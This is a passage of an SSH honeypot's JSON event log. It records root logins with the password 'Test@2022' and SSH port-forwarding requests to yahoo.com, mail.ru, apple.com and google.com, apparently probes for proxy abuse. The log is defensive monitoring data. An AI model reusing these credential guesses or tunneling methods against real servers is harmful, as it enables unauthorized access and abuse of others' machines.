\\xc2J\\x9e\\xf3\\\\^V_\\xc7\\xf3\\xb0.\\x19\\x87s\\xd7\\xd8\\xc4\\x93\\xad^\\xc4\\xb5|_@\\x15\\x83\\xb9\\xdfoJ\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.238834Z","src_ip":"212.227.235.229","session":"36f402c87787"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":31250,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31250","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.292828Z","session":"600b516551dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.343390Z","src_ip":"77.83.207.83","session":"600b516551dd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.394815Z","src_ip":"77.83.207.83","session":"600b516551dd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":34949,"dst_ip":"1.2.3.4","dst_port":22,"session":"044c39ef6a3a","protocol":"ssh","message":"New connection: 77.83.207.83:34949 (1.2.3.4:22) [session: 044c39ef6a3a]","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.445529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.446198Z","src_ip":"77.83.207.83","session":"044c39ef6a3a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.498898Z","src_ip":"77.83.207.83","session":"044c39ef6a3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.53.112.242","dst_port":443,"src_ip":"212.227.235.229","src_port":52384,"message":"direct-tcp connection request to 23.53.112.242:443 from 127.0.0.1:52384","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.538985Z","session":"36f402c87787"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.759391Z","src_ip":"77.83.207.83","session":"044c39ef6a3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.53.112.242","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03G\\x8e\\x92\\x04\\xeb\\x0c\\xe3O\\xe3\\x0f\\xdc\\xb8\\xb2\\xe4\\x90\\xe4`\\x14\\xe9\\xf2f\\xa4_\\x12\\x10\\x1eR\"O\\x14\\xc3|  \\x9a*\\xdb\\xcc\\xbbQ\\xd7\\xd9\\x9b\\xe5\\xf9\\xdbg\\x9f\\xf9\\xedW\\xa0\\xe3|\\xe5\\xc6\\x17\\xe2\\x88\\xba!s\\xa7-\\x02\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 {\\xd2\\xd7\\x97\\xb0&\\x1d\\xf6&\\x1e\\x87\\xee\\x82\\x8c\\x89dpn\\xa4\\x90#a\\xd1\\x8a\\x07#\\x9d8O\\xe6\\xfd\\x01\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 23.53.112.242:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03G\\x8e\\x92\\x04\\xeb\\x0c\\xe3O\\xe3\\x0f\\xdc\\xb8\\xb2\\xe4\\x90\\xe4`\\x14\\xe9\\xf2f\\xa4_\\x12\\x10\\x1eR\"O\\x14\\xc3|  \\x9a*\\xdb\\xcc\\xbbQ\\xd7\\xd9\\x9b\\xe5\\xf9\\xdbg\\x9f\\xf9\\xedW\\xa0\\xe3|\\xe5\\xc6\\x17\\xe2\\x88\\xba!s\\xa7-\\x02\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 {\\xd2\\xd7\\x97\\xb0&\\x1d\\xf6&\\x1e\\x87\\xee\\x82\\x8c\\x89dpn\\xa4\\x90#a\\xd1\\x8a\\x07#\\x9d8O\\xe6\\xfd\\x01\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.765514Z","src_ip":"212.227.235.229","session":"36f402c87787"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17781,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17781","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.812721Z","session":"044c39ef6a3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.865031Z","src_ip":"77.83.207.83","session":"044c39ef6a3a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"172.217.23.196","dst_port":443,"src_ip":"212.227.235.229","src_port":52620,"message":"direct-tcp connection request to 172.217.23.196:443 from 127.0.0.1:52620","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.866760Z","session":"36f402c87787"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"172.217.23.196","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03S\\x14&d\\x8b\\x8e:\\xb12\\xfa.V\\xd7A\\n\\x1ef\\xa9\\x84\\x86y\\x00-\\x8e\\x8d`\\x8bW\\xfe\\x8a7\\x0f C\\xf6u\\xda\\x97\\xd2\\x9e\\xb4\\xa6\\xbe\\xe8,\\xe3\\xaa\\xaf\\xfd\\xf8\\xde\\xff3p\\xdb\\xb5\\xa0\\x9d\\x82r\\x18\\x16\\x14\\xd4c\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 |$\\xe8\\xc2N\\rU\\x03\\xfdc\\x1dH\\xa5_\\x067\\xc6\\xb8.\\xf6\\xe7j\\xd8||\\xfbv)r)x\\x11\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 172.217.23.196:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03S\\x14&d\\x8b\\x8e:\\xb12\\xfa.V\\xd7A\\n\\x1ef\\xa9\\x84\\x86y\\x00-\\x8e\\x8d`\\x8bW\\xfe\\x8a7\\x0f C\\xf6u\\xda\\x97\\xd2\\x9e\\xb4\\xa6\\xbe\\xe8,\\xe3\\xaa\\xaf\\xfd\\xf8\\xde\\xff3p\\xdb\\xb5\\xa0\\x9d\\x82r\\x18\\x16\\x14\\xd4c\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 |$\\xe8\\xc2N\\rU\\x03\\xfdc\\x1dH\\xa5_\\x067\\xc6\\xb8.\\xf6\\xe7j\\xd8||\\xfbv)r)x\\x11\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T03:52:36.980335Z","src_ip":"212.227.235.229","session":"36f402c87787"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31616,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31616","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.010564Z","session":"044c39ef6a3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.062838Z","src_ip":"77.83.207.83","session":"044c39ef6a3a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.093382Z","src_ip":"212.227.235.229","session":"36f402c87787"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":642,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:642","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.210749Z","session":"044c39ef6a3a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.263467Z","src_ip":"77.83.207.83","session":"044c39ef6a3a"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.316602Z","src_ip":"77.83.207.83","session":"044c39ef6a3a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":35066,"dst_ip":"1.2.3.4","dst_port":22,"session":"499246fd7be9","protocol":"ssh","message":"New connection: 77.83.207.83:35066 (1.2.3.4:22) [session: 499246fd7be9]","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.367744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.378033Z","src_ip":"77.83.207.83","session":"499246fd7be9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.419905Z","src_ip":"77.83.207.83","session":"499246fd7be9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.677264Z","src_ip":"77.83.207.83","session":"499246fd7be9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8031,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8031","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.729719Z","session":"499246fd7be9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:37.782484Z","src_ip":"77.83.207.83","session":"499246fd7be9"}
